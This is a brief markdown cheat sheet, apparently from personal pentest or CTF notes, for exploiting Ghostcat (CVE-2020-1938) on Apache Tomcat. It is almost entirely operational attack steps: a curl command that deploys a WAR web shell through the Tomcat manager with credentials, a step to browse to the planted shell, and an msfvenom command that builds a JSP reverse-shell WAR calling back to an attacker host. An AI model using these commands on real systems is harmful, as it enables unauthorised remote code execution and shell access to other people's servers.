# Ghostcat

* CVE-2020-1938
* Msfconsole or [exploitdb](https://www.exploit-db.com/exploits/48143)
* Craft a manual war shell shown at [hacktrick's tomcat site](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat#reverse-shell)
* upload the file via
```sh
curl -T ./webshell.war -u 'user:password' http://$TARGET_IP:8080/manager/text/deploy?path=/shello
``` 
* Visit the webshell at `$TARGET_IP:8080/shello/`
* Alternatively use a war reverse shell via
```sh
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4449 -f war -o revshell.war
```